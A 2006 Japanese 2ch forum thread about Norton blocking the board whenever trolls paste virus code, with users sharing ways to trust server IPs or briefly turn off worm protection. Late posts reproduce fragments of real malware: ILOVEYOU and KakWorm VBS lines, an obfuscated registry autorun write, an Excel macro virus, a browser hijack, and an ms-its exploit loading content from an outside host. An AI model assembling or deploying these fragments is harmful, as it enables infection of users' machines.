ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス ウィルスコードをカキコミできないようにはでけへんの? むしろウイルスコード貼ったヤツは強制フシアナになるようにすればいいんだよ。
どこの誰がやっているか一発でわかるしww いまさらウイルスコードでギャーギャー騒ぐ奴ってなんなの?
馬鹿なの? 今日ちょうどギャーギャー騒いでる奴見かけたところだw
642 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 03:26:36 ID:aqYcE6Jh
だれだ最近、避難所にウイルスコード貼る奴。
専ブラがおかしくなって、そのたびに削除→ダウンロードしなおし→お気に入り登録しなおし、すごい手間、めちゃくちゃ迷惑。
643 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 07:23:59 ID:QvemZE+C
>>642
それって難民フォルダーにあるsubject.txt(専ブラによって名称違うかも)を上書きするだけで直るよ ログ除外してるのに、進入検知だか遮断とか出て更新不能になる
張ってる奴もノー豚も氏ね Norton使わなきゃいいだけの話なのに
何でこんなに盛り上がってんの?
Symantecがクソなだけだろ。
2chがそこまで面倒見る必要ないよ。 _,..--‐‐‐‐‐-...,_
/:::::::::::::::::::::::::::::::::::'.,
/:::::::::::::::::::::::::::::::::::::::::::::::..
i, NOD32厨 ::::::::::::,
ゝ /' '\ :::::::::::'
. -・=-, 、-・=- ::::::::::;'
| .,ノ(・ ・ ( ⌒ ::6)
.l ┃トョヨコイ┃ .ソ < Norton使わなきゃいいだけの話なのに
ヽ┃`ニ'´ ┃ ,.i-、
,`~,'i' "~ / ,>"'-、 ここずっと芸スポにかたっぱしから貼りまくってる奴どうにかして… windowsを最新にして、ひとつのルールを除外するだけで解決するのにな・・・ それがどんなに素晴らしいソフトでも、厨が推奨するソフトは糞。 まぁ、私の場合は
NAVが反応→NAVのオプションから
インターネットワーム防止>AutoBlockルール>全ての遮断を解除
して、インターネットワーム防止を解除(警告が出るので、OKを押しておく)
→2chブラウザのログを取得して、ウィルスコードの部分をローカルあぼーん
で、難なくNAVを使っているわけだが。 >>907
言い忘れたが、インターネットワーム防止を復帰させるのを忘れずに。
#放っておいても、15分で自動復帰するが。 >>909
NAVが反応→2ch鯖が遮断
↓
NAVを起動して、オプションにアクセス。インターネットワーム防止をクリック
↓
AutoBlockルールをクリックして、全ての遮断を解除をクリック
↓
インターネットワーム防止をオンにするのチェックを外す>OKを押す
↓
保護の警告ダイヤログが出る。
停止時間を15分、1時間、5時間、システム再起動まで、永久的から選択可能。
OKを押すとインターネットワーム防止機能が停止。
↓
ログを取得して、ウィルスコードが書かれたレスを
2chブラウザのローカルあぼーん機能で削除する。
#ブラウザ上あぼーんでも、取得したdatには残るソフトでは駄目かも。
↓
インターネットワーム防止機能を復帰させる。 わからない五大理由改
<ノートントラップにかかる六大理由>
1. 読まない ・・・対処法は書いてあるのに読まない。読む気などさらさらない。
2. 調べない ・・・過去スレ、ググるなど最低限の内容も自分で調べようとしない。
3. 試さない ・・・めんどくさいなどの理由で実行しない。する気もない。
4. 理解力が足りない ・・・理解力以前の問題で理解しようとしない。
5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
6. それでもノートンを使う ・・・上記に該当するのに、誤作動を仕様と言って直さない糞ソフトに大事なお金を垂れ流す。 >>910
2003にはないや。orz
dですた。 >912
>5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
それを世間一般では、『 要領がいい 』又は『 狡い 』という。
912は、要領の悪い世間知らずのヒッキーか?
現在回避できないノートントラップなどあるでしょうか?
特にノートンじゃなくても良いのですが、他の不具合が出るとか、
ありますでしょうか。
私は早々にノートンから他のセキュリティー製品に切り替えてしまったので、その辺りが解らないので質問させていただきました。。 >>915
ノートンについては対策全部やってれば特にないよ。
他のは使ってないのでわかんない。 >>912
ノートンを誤作動とか言ってる時点でわかってないじゃない >>920
一応レス後半やまとめサイトの2005のをやった後に一時的によくなったんですが
ダメな板はダメで、その後>>13とかやったんですけどはじかれちゃうんですよ。
他にありませんかね。
30分待てば又スレ読めますので教えてください 専ブラ読み込むたびにノートンの警告でるの止めたいのですが >>917 さん
返信ありがとうございます、参考にさせていただきます。
>>916 さん
情報ありがとうございます
アバストについては自分で調べてみます。 928の後、調べたところ、
アバストも設定で回避できるということがわかりました、
ノートンも確認済み。
(微妙にすれ違い失礼しました。) NIS2005の場合(多分NIS2006も同じ)
タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
NISが開いたら、左側の一覧から「Norton Internet Security」を選ぶ
システムの状態一覧から「ファイアーウォール」を選ぶ
左下にある「設定」ボタンを選ぶ
「ネットワーク」タブを選ぶ
「信頼」タブを選ぶ
「追加」を選ぶ
「個別」を選ぶ
アドレスに以下の数字の塊を一行でコピペする ← ここで、コピペができません。どうしたらいいですか?
どうせ右クリ効かないとかだろ
初心者板行けと言いたいところだがctrl+v >>937
できました。 ありがとうございました。 とあるスレ一覧更新したら「WScript.KakWorm」の警告がでます
どうやって誤検知除外したらいいのでしょうか?
つーか、例の構文貼られても遮断しなくなった。
ノートン側が折れて対応したって事なのか? ttp://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・ さっきから同じファイルばっかり表示して感染してる感染してるってノートンが騒いで
ます。まじめにうざいので黙らせる方法を教えてください。 そういえば。この間延長キーを購入したんですが、支払って二週間たっても延長キー
とやらが添付されたメールが届かないんですよ。ウイルスバスターとかも
こんなもんなの? >>910
すみません。便乗質問になってしまいますが。
最近NAV2004からNIS2006に切り替えたので、>>910 の設定を見かけて
ついでにやっておこうと思ったのですが、
「インターネットワーム防止」と言う項目が見つかりません。
これはNAVパッケージにしかない項目なのでしょうか。
NISの場合は何処を設定すると良いのでしょうか。 >>951,952
ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。 NGワードに追加してもNGワードの.txtが削除される・・・ 専用ブラウザのフォルダ丸ごと監視対象から外す、これ最短。 >>1と同じ状態になってるんだけどどうすればいいの・・・ >>956
1.このスレを最初から読む
2.Nortonの使用をやめる
お好きな方をどうぞ ためしにNAVの設定元に戻してみたら
引っかからなくなってるような。(<body onload=w****w()>)
シマンテックが対策した?
NISはもってないからわからんけど。 vbsウイルスのソースじゃなくて侵入を検出して遮断しました、の
やつだよ。 もう頭悪いからノーdの設定ができない。
自分の常連のスレ片っ端から張られてギコだめだし、
IEで見るようになった。
もう更新やめて別のアンチウィルスソフトにするかな。
それまで我慢してだ。
でもシマンテックの客が減るよな〜。 >>965
ってか
このスレは侵入を検出して遮断しました用のスレだと思ってた。
vbsウイルスのソースに誤反応、のスレは他にあるし。。 あ、レス読み違えたスマソ
うちでは何故かnavの設定戻して一度も開いたことないスレのログ取ってみても再現しない。
nav2005です。vbsウイルス用のフォルダ除外の設定はそのまま。 >>968
だってNAVが誤反応してるわけじゃないもの。
侵入検知はファイアーウォールのお仕事でしょ。 >>969
>>687以降参照。
NISだけの現象なら始めからこのスレにくることもなかったわけだが。。 まあとにかくNIS2004だと相変わらず反応するわけだ >>971 レスthx
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。 連投すまそ、
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
??? 今まで>>974みたいのを専ブラでNGワードに指定していたら、
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。 専ブラったっていろいろあるから
NGワードの処理の仕方も同じじゃない 専ブラは変えてないなら
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ) ごめん、シリア語ブラクラはノートンとは関係ないね。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。 t2.WriteLine('"Search Bar"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm"');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen." レス数が950を超えています。1000を超えると書き込みができなくなります。